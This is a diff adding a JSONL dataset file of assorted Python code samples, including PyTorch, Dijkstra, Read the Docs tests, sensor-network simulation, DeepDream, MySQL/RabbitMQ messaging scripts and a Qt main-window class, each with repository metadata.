diff --git "a/304.jsonl" "b/304.jsonl" new file mode 100644--- /dev/null +++ "b/304.jsonl" @@ -0,0 +1,673 @@ +{"seq_id":"182826573","text":"import torch\nfrom torch.autograd import Variable\n\ntensor = torch.FloatTensor(([1,2],[3,4]))\nvariable = Variable(tensor,requires_grad = True)\n\nt_out = torch.mean(tensor*tensor) #compute tenser^2\nv_out = torch.mean(variable*variable)\n\nprint(t_out)\nprint(v_out)\n\nv_out.backward() #反向传播\nprint(variable.grad) #打印结果\n\n#Variable对tensor进行封装\n#即Variable.data 就是封装的tensor\n#tensor和numpy.array可以转化\n#Variable.data.numpy()即可实现与numpy的转化\nprint(variable.data.numpy())\n","sub_path":"python/learnPyTorch/517/demoTorch.py","file_name":"demoTorch.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"67481646","text":"# 0012\n# 2018/08/02\n# 当用户输入敏感词语,则用 星号 * 替换。\n\n__author__ = 'czhzz'\n\ndef filter_word(text):\n f = open('filtered_words.txt', encoding='utf-8')\n for word in f.read().split('\\n'):\n if word in text:\n text = text.replace(word, '*' * len(word))\n return text\n\nif __name__ == '__main__':\n text = input('>')\n output = filter_word(text)\n print(output)\n","sub_path":"0012/0012.py","file_name":"0012.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"626332220","text":"# -*- coding: utf-8 -*-\nimport utils, os\n\nversion = '3.5'\nsystem_model = 'Allocation, APOS'\nfolder = utils.version_system_model_path(version, system_model)\nfilelist = utils.build_file_list(os.path.join(folder, 'datasets'))\nfilelist = set([x.split('.')[0] for x in filelist])\npdf_list = utils.build_file_list(os.path.join(folder, 'pdf'))\npdf_list = set([x.split('.')[0].lower() for x in pdf_list])\nmissing_pdf = filelist.difference(pdf_list)\n\nao = utils.pkl_load(os.path.join(folder, 'pkl'), 'ao')\nao_filelist = set(ao['filename'])\nfilelist = set(utils.build_file_list(os.path.join(folder, 'datasets')))\nfilelist.issubset(ao_filelist)\nao_filelist.issubset(filelist)","sub_path":"projects/short_scripts/missing_PDF.py","file_name":"missing_PDF.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"112607225","text":"import json\nimport os\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom unittest import mock\n\nfrom django.test import TestCase\nfrom django.test.utils import override_settings\nfrom django_dynamic_fixture import get\n\nfrom readthedocs.embed.views import do_embed\nfrom readthedocs.projects.constants import MKDOCS\nfrom readthedocs.projects.models import Project\n\ndata_path = Path(__file__).parent.resolve() / 'data'\n\n\n@override_settings(\n USE_SUBDOMAIN=True,\n PUBLIC_DOMAIN='readthedocs.io',\n DEBUG=True,\n)\nclass APITest(TestCase):\n\n def setUp(self):\n self.project = get(\n Project,\n main_language_project=None,\n slug='project',\n )\n\n def _mock_open(self, content):\n @contextmanager\n def f(*args, **kwargs):\n read_mock = mock.MagicMock()\n read_mock.read.return_value = content\n yield read_mock\n return f\n\n @mock.patch('readthedocs.embed.views.build_media_storage')\n def test_embed_sphinx(self, storage_mock):\n json_file = data_path / 'sphinx/latest/index.fjson'\n html_content = data_path / 'sphinx/latest/index.html'\n\n json_content = json.load(json_file.open())\n json_content['body'] = html_content.open().read()\n\n 
        storage_mock.exists.return_value = True\n        storage_mock.open.side_effect = self._mock_open(\n            json.dumps(json_content)\n        )\n\n        response = do_embed(\n            project=self.project,\n            version=self.project.versions.first(),\n            doc='index',\n            section='Features',\n            path='index.html',\n        )\n\n        expected = {\n            'content': [],\n            'headers': [\n                {'Welcome to Read The Docs': '#'},\n            ],\n            'url': 'http://project.readthedocs.io/en/latest/index.html',\n            'meta': {\n                'project': 'project',\n                'version': 'latest',\n                'doc': 'index',\n                'section': 'Features',\n            },\n        }\n\n        self.assertDictEqual(response.data, expected)\n\n    @mock.patch('readthedocs.embed.views.build_media_storage')\n    def test_embed_mkdocs(self, storage_mock):\n        json_file = data_path / 'mkdocs/latest/index.json'\n        storage_mock.exists.return_value = True\n        storage_mock.open.side_effect = self._mock_open(\n            json_file.open().read()\n        )\n\n        self.project.versions.update(documentation_type=MKDOCS)\n\n        response = do_embed(\n            project=self.project,\n            version=self.project.versions.first(),\n            doc='index',\n            section='Installation',\n            path='index.html',\n        )\n\n        expected = {\n            'content': mock.ANY, # too long to compare here\n            'headers': [\n                {'Overview': 'overview'},\n                {'Installation': 'installation'},\n                {'Getting Started': 'getting-started'},\n                {'Adding pages': 'adding-pages'},\n                {'Theming our documentation': 'theming-our-documentation'},\n                {'Changing the Favicon Icon': 'changing-the-favicon-icon'},\n                {'Building the site': 'building-the-site'},\n                {'Other Commands and Options': 'other-commands-and-options'},\n                {'Deploying': 'deploying'},\n                {'Getting help': 'getting-help'},\n            ],\n            'url': 'http://project.readthedocs.io/en/latest/index.html',\n            'meta': {\n                'project': 'project',\n                'version': 'latest',\n                'doc': 'index',\n                'section': 'Installation',\n            },\n        }\n        self.assertDictEqual(response.data, expected)\n","sub_path":"readthedocs/embed/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
+{"seq_id":"113999371","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport math\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport bellamn_ford\nimport johnson\n\ndef a(G,l,b):# function that returns the weight of the connection between the two vertices passed to this function\n    waga = 0\n    for i in G[l]:\n        if i[0] == b: # i[0] is used here because of the graph representation\n            waga = i[1]\n    return waga\n\n\ndef dijkstra(G,s,w = 1):# s is the start vertex\n    p = {} # dictionary containing previously visited vertices\n    d = {} # dictionary containing distances from the start vertex\n    f = {} # helper variable, initially equal to d; its entries are zeroed out later\n    Q = [] # set of vertices without a determined shortest path\n\n    for u in G: # give each vertex a predecessor of 0 and\n                # a distance equal to infinity\n        p[u] = 0\n        d[u] = math.inf\n        f[u] = math.inf\n        Q.append(u)\n    Q.remove(s)\n    d[s] = 0\n    f[s] = 0\n    u_prim = s\n    A= []\n    while Q : # iterate over the set of unvisited vertices\n        sasiedzi = []\n        for u in G[u_prim]:\n            sasiedzi.append(u[0])\n        lst = [value for value in sasiedzi if value in Q] # check which vertices are both in Q and among the neighbours\n        # of the current vertex\n        for u in lst:\n            if d[u_prim] + a(G, u_prim,u) < d[u]: # assign a new distance value if the condition is met\n                d[u] = d[u_prim] + a(G, u_prim,u)\n                f[u] = d[u]\n                p[u] = u_prim\n        wartosci_f = []\n        for k in f : # add the beta values to a list in order to find the minimum\n            wartosci_f.append(f[k])\n        m = min(i for i in wartosci_f if i > 0 ) # get the index of the minimal value in the list\n        index = wartosci_f.index(m)\n        licznik = 0\n        for k in f: # now find which value in f corresponds to the found index\n            if licznik == index:\n                u_pomocnicze = k\n                f[k] = 0 # zero the value for vertex k in f so the minimum is easier to find in the next iterations\n                break\n            licznik += 1\n        u_prim = u_pomocnicze\n\n        Q.remove(u_prim) # remove the visited vertex from Q\n\n    A.append(w) # list the visited vertices\n    for i in range(len(G)):\n        if p[w] != 0:\n            q = p[w]\n            A.append(q)\n            w = q\n    return A[::-1], d\n\ndef adding_and_showing(G):\n    Gr = nx.Graph()\n    for i in G:\n        for j in G[i]:\n            Gr.add_edge(i,j[0], weight = j[1])\n    pos = nx.spring_layout(Gr)\n    nx.draw(Gr, pos=pos, with_labels=True, font_weight='bold')\n    nx.draw_networkx_edge_labels(Gr, pos, edge_labels=nx.get_edge_attributes(Gr, 'weight'))\n    plt.show()\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n    G = {\n        1: [[2, 4], [3, 2], [4, 5], [5, 2]],\n        2: [[1, 4], [4,4], [7, 1], [8, 2]],\n        3: [[1, 2], [4, 2], [5, 2], [6, 2]],\n        4: [[1, 5], [2, 4], [3, 2], [6, 4], [7, 2]],\n        5: [[1, 2], [3, 2], [6, 9]],\n        6: [[3, 2], [4, 4], [5, 9]],\n        7: [[2, 1], [4, 2], [8, 2]],\n        8: [[2, 2], [7, 2], [9, 2], [10, 7]],\n        9: [[8, 2], [10, 11]],\n        10: [[9, 11], [8, 7]]\n    }\n    G_p = {\n        1:[[2,-4],[8,8]],\n        2:[[1,-4],[3,8],[8,11]],\n        3:[[2,8],[9,2],[6,4],[4,-7]],\n        4:[[3,-7],[6,14],[5,9]],\n        5:[[4,9],[6,10]],\n        6:[[3,4],[4,14],[5,10],[7,2]],\n        7:[[6,2],[8,1],[9,6]],\n        8:[[1,8],[2,11],[7,1],[9,7]],\n        9:[[3,2],[7,6],[8,7]]\n    }\n\n    aa, g = dijkstra(G, 1, 3)\n    adding_and_showing(G)\n    print(aa)\n    print(g)\n\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
+{"seq_id":"330922459","text":"import argparse\nimport csv\nimport datetime\nimport logging\nimport multiprocessing\nimport os\nimport time\nimport sys\nfrom collections import namedtuple\n\nimport numpy as np\n\nfrom wsnsims.conductor import sim_inputs\nfrom wsnsims.core.environment import Environment\nfrom wsnsims.core.results import Results\nfrom wsnsims.loaf.loaf_sim import LOAF\n\nlogging.basicConfig(level=logging.WARNING)\nlogger = logging.getLogger(__name__)\n\nRUNS = 50\nWAIT_TIME = 100\n\nParameters = namedtuple('Parameters',\n                        ['segment_count', 'mdc_count', 'isdva', 'isdvsd',\n                         'radio_range'])\n\n\ndef average_results(results):\n    mean_max_delay = np.mean([x.max_delay for x in results])\n    mean_balance = np.mean([x.balance for x in results])\n    mean_lifetime = np.mean([x.lifetime for x in results])\n    mean_energy = np.mean([x.ave_energy for x in results])\n    mean_buffer = np.mean([x.max_buffer for x in results])\n\n    result = Results(mean_max_delay, mean_balance, mean_lifetime, mean_energy,\n                     mean_buffer)\n    return result\n\ndef run_loaf(parameters):\n    \"\"\"\n\n    :param parameters:\n    :type parameters: Parameters\n    :return:\n    \"\"\"\n\n    env = Environment()\n    env.segment_count = parameters.segment_count\n    env.mdc_count = parameters.mdc_count\n    env.isdva = parameters.isdva\n    env.isdvsd = parameters.isdvsd\n    env.comms_range
= parameters.radio_range\n\n loaf_sim = LOAF(env)\n\n print(\n \"Starting LOAF at {}\".format(datetime.datetime.now().isoformat()))\n print(\"Using {}\".format(parameters))\n start = time.time()\n runner = loaf_sim.run()\n\n results = Results(runner.maximum_communication_delay(),\n runner.energy_balance(),\n 0.,\n runner.average_energy(),\n runner.max_buffer_size())\n\n print(\"Finished LOAF in {} seconds\".format(time.time() - start))\n return results\n\ndef run(parameters):\n\n loaf_results = []\n\n with multiprocessing.Pool() as pool:\n\n while len(loaf_results) < RUNS:\n\n loaf_workers = []\n\n if len(loaf_results) < RUNS:\n loaf_workers = [\n pool.apply_async(run_loaf, (parameters,))\n for _ in range(RUNS - len(loaf_results))]\n\n for result in loaf_workers:\n try:\n loaf_results.append(result.get(timeout=WAIT_TIME))\n except Exception:\n logger.exception('LOAF Exception')\n continue\n\n mean_loaf_results = loaf_results[:RUNS]\n\n return (mean_loaf_results)\n\n\ndef get_argparser():\n parser = argparse.ArgumentParser()\n parser.add_argument('--outdir', '-o', type=os.path.realpath, default='results')\n\n return parser\n\n\ndef main():\n parser = get_argparser()\n args = parser.parse_args()\n\n start = time.time()\n seed = int(time.time())\n print(\"Random seed is %s\", seed)\n np.random.seed(seed)\n\n parameters = [Parameters._make(p) for p in sim_inputs.conductor_params]\n\n headers = ['max_delay', 'balance', 'lifetime', 'ave_energy', 'max_buffer']\n # noinspection PyProtectedMember\n headers += parameters[0]._fields\n\n results_dir = args.outdir\n if not os.path.isdir(results_dir):\n os.makedirs(results_dir)\n\n loaf_filepath = os.path.join(results_dir, 'loaf.csv')\n \n loaf_exists = os.path.isfile(loaf_filepath)\n\n with open(loaf_filepath, 'w', newline='') as loaf_csv:\n\n loaf_writer = csv.DictWriter(loaf_csv, fieldnames=headers)\n \n if not loaf_exists:\n loaf_writer.writeheader()\n\n for parameter in parameters:\n loaf_res = run(parameter)\n\n for res in loaf_res:\n loaf_writer.writerow(\n {**res._asdict(), **parameter._asdict()})\n loaf_csv.flush()\n\n finish = time.time()\n delta = finish - start\n print(\"Completed simulation in {} seconds\".format(delta))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"wsnsims/conductor/loafdriver.py","file_name":"loafdriver.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"365738312","text":"from django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom selenium.webdriver.firefox.webdriver import WebDriver\n\n\nclass SalesBackendTest(StaticLiveServerTestCase):\n\n @classmethod\n def setUpClass(cls):\n super(SalesBackendTest, cls).setUpClass()\n cls.selenium = WebDriver()\n cls.selenium.implicitly_wait(10)\n\n @classmethod\n def tearDownClass(cls):\n cls.selenium.quit()\n super(SalesBackendTest, cls).tearDownClass()\n\n def test_connect(self):\n url = 'http://localhost:8000/sales/listsorders'\n self.selenium.get(url)\n self.selenium.find_element_by_id('id_customer_staff')","sub_path":"sales/tests/test_liveserver.py","file_name":"test_liveserver.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"12812161","text":"#Deep Dream imports\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing import image\n\n\nimport sys\nimport lib.transforms as transforms\nfrom lib.utils import azim_proj\nfrom lib.BCI import BCI\nfrom 
lib.DeepDream import DeepDream, calc_loss\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\nimport cv2\n\n# Normalize an image\ndef deprocess(img):\n img = 255*(img + 1.0)/2.0\n return tf.cast(img, tf.uint8)\n\n\ndef run_deep_dream_simple(img, steps=100, step_size=0.01):\n\n # Convert from uint8 to the range expected by the model.\n img = tf.keras.applications.inception_v3.preprocess_input(img)\n img = tf.convert_to_tensor(img)\n step_size = tf.convert_to_tensor(step_size)\n steps_remaining = steps\n step = 0\n while steps_remaining:\n if steps_remaining>100:\n run_steps = tf.constant(100)\n else:\n run_steps = tf.constant(steps_remaining)\n steps_remaining -= run_steps\n step += run_steps\n\n loss, img = dream(img, run_steps, tf.constant(step_size))\n\n #display.clear_output(wait=True)\n #show(deprocess(img))\n #print (\"Step {}, loss {}\".format(step, loss))\n\n\n result = deprocess(img)\n #display.clear_output(wait=True)\n #show(result)\n\n return np.array(result)\n\n\nif __name__ == '__main__':\n print(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\n\n band_freqs = { 'Delta' : (0, 4), # index: 0\n 'Theta' : (4, 7), # index: 1\n 'Alpha' : (7, 15), # index: 2\n 'Beta' : (15, 31), # index: 3\n 'Gamma' : (31, 45) } # index: 4\n\n base_model = tf.keras.applications.InceptionV3(include_top=False, weights='imagenet')\n\n # Maximize the activations of these layers\n names = ['mixed3', 'mixed5']\n layers = [base_model.get_layer(name).output for name in names]\n\n # Create the feature extraction model\n dream_model = tf.keras.Model(inputs=base_model.input, outputs=layers)\n dream = DeepDream(dream_model)\n\n\n bci = BCI(band_freqs, blue=1, green=2, red=4)\n while True:\n\n # Run LSL in Band Power Mode, 16 channels\n #cv2.imshow('', cv2.resize(bci.plot_fft_bashivan(50), (600,600), interpolation=cv2.INTER_CUBIC))\n #cv2.waitKey(1)\n\n # Run LSL in FFT Mode, 125 channels\n #cv2.imshow('', bci.plot_fft_naive(600))\n #cv2.waitKey(1)\n img = bci.plot_fft_bashivan(50)\n img = run_deep_dream_simple(img=img, steps=100, step_size=0.01)\n cv2.imshow('', cv2.resize(img, (1000,1000), interpolation=cv2.INTER_CUBIC))\n cv2.waitKey(1)\n\n\n print('done')\n exit(0)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"11946254","text":"import numpy as np\nfrom numpy.random import seed\nfrom scipy.optimize import fmin_cobyla\nimport math\nimport random\nfrom distanceToCurve import distanceToCurve\nimport seeding\n#import timeit\n\n# seed for reproduceable datasets\nseedNum = seeding.getSeed()\n\n#Vector function\ndef genFunctionUniform(degree = 2,minimum = -7,maximum = 7):\n coefficients = []\n for i in range(degree+1):\n random.seed(seedNum)\n coefficient = random.randrange(minimum,maximum)\n coefficients.insert(0,coefficient)\n return coefficients\n\ndef genFunctionGaussian(degree = 2,mean = 0,sigma = 7, scaling = False):\n coefficients = []\n for i in range(degree+1):\n if(scaling):\n eSigma = sigma/(i+1)\n else:\n eSigma = sigma\n coefficient = gauss(mean,eSigma)\n coefficients.append(coefficient)\n return coefficients\n\ndef evalFunction(coVec,ipVar):\n boundaryPoint = 0\n maximum = len(coVec) - 1\n for i in range(len(coVec)):\n power = maximum - i\n termVal = pow(ipVar,power)*coVec[power]\n boundaryPoint += termVal\n return boundaryPoint\ndef pointDistance(x1,y1,x2,y2):\n return 
np.sqrt(pow((x1-x2),2)+pow((y1-y2),2))\n'''\ndef distanceToCurve(coVec,ipVar,dpVar):\n    maxDistance = abs(dpVar - evalFunction(coVec, ipVar))\n    xMin = fmin_cobyla(\\\n        lambda x: pointDistance(ipVar,dpVar,x[0],evalFunction(coVec, x[0]))\\\n        ,x0 = [ipVar,ipVar],\\\n        cons = [lambda x: abs(ipVar-maxDistance)],\\\n        rhoend = 1e-3)\n    return pointDistance(ipVar,dpVar,xMin[0], evalFunction(coVec, xMin[0]))\n'''\ndef gauss(distance, sigma):\n    sigmaComponent = pow(sigma,2)*2\n    #denominator = math.sqrt(math.pi*sigmaComponent)\n    #I want to control the max height\n    denominator = 1\n    if( sigmaComponent == 0):\n        return 0\n    numerator = math.exp(-pow(distance,2)/sigmaComponent)\n    return numerator/denominator\n\n# [1,1] y = x + 0, y = x + 1\ndef getPoints(coVec,numPoints,sigma,peak,xMin,xMax,yMin,yMax):\n    seed(seedNum)\n    x = np.random.rand(numPoints)\n    xRange = xMax - xMin\n    x = list(map(lambda v: (v*xRange)+xMin,x))\n    seed(seedNum*2)\n    y = np.random.rand(numPoints)\n    yRange = yMax - yMin\n    y = list(map(lambda v: (v*yRange)+yMin,y))\n    boundaryPoints = np.polyval(coVec,x)\n    distances = list(map(lambda m,n: distanceToCurve(coVec,m,n),x,y))\n    distances = list(map(lambda x:peak*x,distances))\n    gaussian = list(map(lambda d: gauss(d,sigma),distances))\n    seed(seedNum)\n    flip = list(map(lambda g: (np.random.uniform()<g),gaussian))\n    cleanVals = list(map(lambda y,b: (y>b),y,boundaryPoints))\n    dirtyVals = list(map(lambda v,f: v^f, cleanVals,flip))\n    points = list(map(lambda i,d,v: [i,d,v],x,y,dirtyVals))\n    return points\n","sub_path":"GaussianBoundary.py","file_name":"GaussianBoundary.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"624031606","text":"# I load the Student structure (concept) from the\n# structure file. This way the student concept becomes\n# a known concept in this context.\nfrom structure import Student\n\n# create a list to hold the student records\nstudents = []\n\n# decide how many records to take from the user\nfor i in range(2):\n    name = input(\"name: \")\n    dorm = input(\"dorm: \")\n    favorite_class = input(\"favorite class: \")\n\n    # create a variable which will carry the subject with its attributes\n    s = Student(name, dorm, favorite_class)\n    students.append(s)\n\n\n# print out all information in students list\nfor student in students:\n    print(\"{} lives in {} and likes {}\".format(student.name,\n                                               student.dorm,\n                                               student.favorite_class))\n","sub_path":"learning_python/test_pys/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"333924072","text":"import csv\nfrom time import sleep\nimport storage\nimport time\nfrom datetime import datetime\nimport mmap\nimport os\n\n###########################transmission data to db####################################\ndef update_db(txx,rid,timestr,datestr):\n\n    timebty = bytearray(timestr, 'utf-8')\n    datebty = bytearray(datestr, 'utf-8')\n    txx = bytearray(txx, 'utf-8')\n    rid = bytearray(rid, 'utf-8')\n    conn = storage.connect()\n    c = conn.cursor(buffered =True)\n    c.execute(\"SELECT * FROM veh_all_bl where veh_no=%s\",(txx,))\n    row = c.fetchone()\n    if not row :\n        #print(\"Not exist\")\n        c.execute(\"SELECT MAX(veh_id) FROM veh_all_bl\")\n        row1= c.fetchone()\n        new_id=row1[0]+1\n        #print(row1[0])\n        c.execute(\"INSERT INTO veh_all_bl(veh_id,veh_no) VALUES(%s,%s)\",(new_id,txx))\n        time.sleep(0.1)\n        c.execute(\"INSERT INTO
veh_lpinfotbl(lp_noid,ckpnt_id,lp_time,lp_date) VALUES(%s,%s,%s,%s)\",(new_id,rid,timebty,datebty))\n else:\n #print (\"exist\")\n c.execute(\"SELECT veh_id FROM veh_all_bl WHERE veh_no =%s\",(txx,))\n row2= c.fetchone()\n c.execute(\"INSERT INTO veh_lpinfotbl(lp_noid,ckpnt_id,lp_time,lp_date) VALUES(%s,%s,%s,%s)\",(row2[0],rid,timebty,datebty))\n time.sleep(0.1)\n conn.commit()\n c.close()\n#############################send data ###################################\ndef transmit_no(x,rid,timest,datest):\n try:\n #conn = storage.connect()\n #c = conn.cursor()\n #############################\n print(\"Sending new data.\")\n update_db(x,rid,timest,datest)\n #c.execute(\"INSERT INTO veh_lpinfotbl(lp_no, lp_date, lp_time,chkpnt_id) VALUES(%s, %s, %s,%s)\",(x,datestr,timestr,rid))\n # inserted=True\n #conn.commit()\n #c.close()\n print(\"Sending new data is done....\")\n except Exception as e:\n print (e)\n sleep(1)\n print(\"No conncetion to DB. Saving offline\")\n z= open('ins.txt','a')\n #z.write(x +'\\n')\n z.write(x +',')\n z.write(datest +',')\n z.write(timest +',')\n z.write(rid +'\\n')\n z.close()\n print(\"Saving offline is done\")\n finally:\n if check(x):\n #print('Violated')\n return (False)\n else:\n #print('PASS')\n return (True)\n#########################resend unsent data########################################\ndef re_send():\n #conn = storage.connect()\n #c = conn.cursor()\n #############################upload old\n f= open('ins.txt','rt')\n #f.seek(0) #ensure you're at the start of the file..\n first_char = f.read(1) #get the first character\n if first_char:\n print (\"There are unsent data.....Sending\")\n #print (first_char)\n f.seek(0)\n reader = csv.reader(f, delimiter = ',', skipinitialspace=True)\n lineData = list()\n #cols = next(reader) skip the first lineData\n cols = reader\n\n for line in reader:\n if line != []:\n lineData.append(line)\n for i in range(len(lineData)):\n #c.execute(\"INSERT INTO veh_lpinfotbl(lp_no, lp_date, lp_time,chkpnt_id) VALUES(%s, %s, %s,%s)\",(lineData[i][0],lineData[i][1],lineData[i][2],lineData[i][3]))\n update_db(lineData[i][0],lineData[i][3],lineData[i][2],lineData[i][1])\n f.close()\n f = open('ins.txt', 'w') # to empty the file\n f.close()\n print(\"Sending old data is done.\")\n else:\n print(\"There are no unsent data\")\n\n\n#######################chk if viol table in db was modified#####################################\ndef chkdbtime():\n try:\n conn = storage.connect()\n c = conn.cursor(buffered=True)\n c.execute(\"SELECT UPDATE_TIME FROM information_schema.tables WHERE TABLE_SCHEMA = 'db_lp_ckpnt20193' AND TABLE_NAME = 'veh_all_bl'\")\n c.execute(\"SELECT UPDATE_TIME FROM information_schema.tables WHERE TABLE_SCHEMA = 'db_lp_ckpnt20193' AND TABLE_NAME = 'veh_lpinfotbl'\")\n\n y=c.fetchone()\n tdb = y[0] #the data from db is tuple, convert it to date timetuple\n tdb = datetime.strptime(str(tdb), \"%Y-%m-%d %H:%M:%S\")\n tdb=str(tdb)\n conn.commit()\n c.close()\n return (tdb)\n except Exception as e:\n print (e)\n pass\n#######################check if lp is violation#####################################\ndef check(x):\n fo = open(\"viol.txt\", \"r\")\n file_contents = fo.read()\n Flag = 0\n for i in file_contents.split('\\n'):\n if x == i:\n Flag = 1\n if Flag == 1:\n return True\n else:\n return False\n#######################get viol from db#####################################\ntold =time.strftime('2019-08-29 10:22:22')\ndef get_viol():\n global told\n try:\n conn = storage.connect()\n c = conn.cursor(buffered=True)\n 
tnew=chkdbtime()\n if tnew>told:\n print(\"Updating viol list\")\n #c.execute(\"SELECT veh_no FROM veh_all_bl WHERE bl_flg=%s\",(bl,))\n f= open('viol.txt','w')\n c.execute(\"SELECT veh_no FROM veh_all_bl WHERE bl_flg='1'\")\n rows = c.fetchall()\n for row in rows:\n #print(row[0])\n f.write(row[0] +'\\n')\n f.close\n conn.commit()\n c.close()\n told=tnew\n else: print(\"no viol updates\")\n except Exception as e:\n print (e)\n pass\n#########################fetch viol from db and resend unsent data#################################\ndef all_a():\n while True:\n try:\n if os.path.getsize(\"ins.txt\") > 0: \n re_send() \n else:\n print(\"Nothing to send\")\n get_viol()\n '''\n x='111111'\n if check(x):\n print('True')\n else:\n print('False')\n '''\n time.sleep(5)\n except Exception as e:\n print (\"no connection to db\")\n pass\n##################################################################\n","sub_path":"object_detection/send_check.py","file_name":"send_check.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"141675568","text":"#!/usr/bin/env python\nimport pika, os\nimport logging\nimport subprocess\nimport sys\nimport json\n\ncredentials = pika.PlainCredentials('pubsub','pubsub')\nparams = pika.ConnectionParameters(host='optimum.euprojects.net',port=8925,credentials=credentials)\n\nconnection = pika.BlockingConnection(params)\n\nchannel = connection.channel()\nchannel.exchange_declare(exchange='events',type='fanout')\n\nresult = channel.queue_declare(exclusive=True)\nqueue_name = result.method.queue\n\nchannel.queue_bind(exchange='events',\n queue=queue_name)\nchannel1 = connection.channel()\nchannel1.exchange_declare(exchange='notifications',type='fanout')\n\nresult1 = channel1.queue_declare(exclusive=True)\nqueue_name1 = result1.method.queue\n\nchannel1.queue_bind(exchange='notifications',\n queue=queue_name1)\n\nprint(' [*] Waiting for logs. 
To exit press CTRL+C')\n\ndef on_message(ch, method, properties, body):\n print(\" [x] %r\" % body)\n new = json.loads(body)\n new['notification'] = \"notification_text\"\n new['confidence_level'] = \"75%\"\n new['user_id']= \"userID\"\n mes=json.dumps(new)\n #channel.basic_ack(delivery_tag=method.delivery_tag)\n channel1.basic_publish(exchange='notifications',routing_key='',body=mes, \n\t\t\tproperties=pika.BasicProperties(reply_to = queue_name1),mandatory=True)\n\n\nchannel.basic_consume(on_message,\n queue=queue_name,\n no_ack=True)\n\nchannel.start_consuming()\n","sub_path":"test_send_event.py","file_name":"test_send_event.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"569304122","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Philipp Temminghoff\n\"\"\"\n\nfrom typing import Union\nimport logging\n\nimport qtawesome as qta\nfrom qtpy import QtCore, QtWidgets, QtGui\n\nfrom prettyqt import core, widgets, gui\nfrom prettyqt.utils import bidict\n\n\nDOCK_POSITIONS = bidict(top=QtCore.Qt.TopDockWidgetArea,\n bottom=QtCore.Qt.BottomDockWidgetArea,\n left=QtCore.Qt.LeftDockWidgetArea,\n right=QtCore.Qt.RightDockWidgetArea)\n\nTOOLBAR_AREAS = bidict(left=QtCore.Qt.LeftToolBarArea,\n right=QtCore.Qt.RightToolBarArea,\n top=QtCore.Qt.TopToolBarArea,\n bottom=QtCore.Qt.BottomToolBarArea,\n all=QtCore.Qt.AllToolBarAreas,\n none=QtCore.Qt.NoToolBarArea)\n\n\nQtWidgets.QMainWindow.__bases__ = (widgets.Widget,)\n\n\nclass MainWindow(QtWidgets.QMainWindow):\n \"\"\"\n Class for our mainWindow\n includes all docks, a centralwidget and a toolbar\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setDockOptions(self.AllowTabbedDocks |\n self.AllowNestedDocks |\n self.GroupedDragging |\n self.AnimatedDocks)\n\n def __getitem__(self, index):\n return self.findChild(QtWidgets.QWidget, index)\n\n def __getstate__(self):\n icon = gui.Icon(self.windowIcon())\n return dict(central_widget=self.centralWidget(),\n title=self.windowTitle(),\n is_maximized=self.isMaximized(),\n icon=icon if not icon.isNull() else None,\n size=(self.size().width(), self.size().height()))\n\n def __setstate__(self, state):\n self.__init__()\n self.title = state[\"title\"]\n self.set_icon(state[\"icon\"])\n if state[\"central_widget\"]:\n self.setCentralWidget(state[\"central_widget\"])\n self.resize(state[\"size\"])\n if state[\"is_maximized\"]:\n self.showMaximized()\n self.resize(*state[\"size\"])\n self.box = self.layout()\n\n def set_widget(self, widget):\n self.setCentralWidget(widget)\n\n def createPopupMenu(self):\n # qactions = self.createPopupMenu()\n menu = widgets.Menu(parent=self)\n for i, item in enumerate(self.get_docks()):\n action = widgets.Action(item.windowTitle(), parent=self)\n action.set_checkable(True)\n action.set_checked(item.isVisible())\n action.set_shortcut(f\"Ctrl+Shift+{i}\")\n action.set_shortcut_context(\"application\")\n action.toggled.connect(item.setVisible)\n menu.add_action(action)\n menu.add_separator()\n for i in self.get_toolbars():\n action = widgets.Action(i.windowTitle(), parent=self)\n action.set_checkable(True)\n action.toggled.connect(i.setVisible)\n action.set_checked(i.isVisible())\n menu.add_action(action)\n return menu\n\n def add_toolbar(self, toolbar, position: str = \"top\"):\n \"\"\"adds a toolbar to the mainmenu at specified area\n\n Valid values for position: \"left\", \"right\", \"top\", \"bottom\"\n\n Args:\n toolbar: toolbar to 
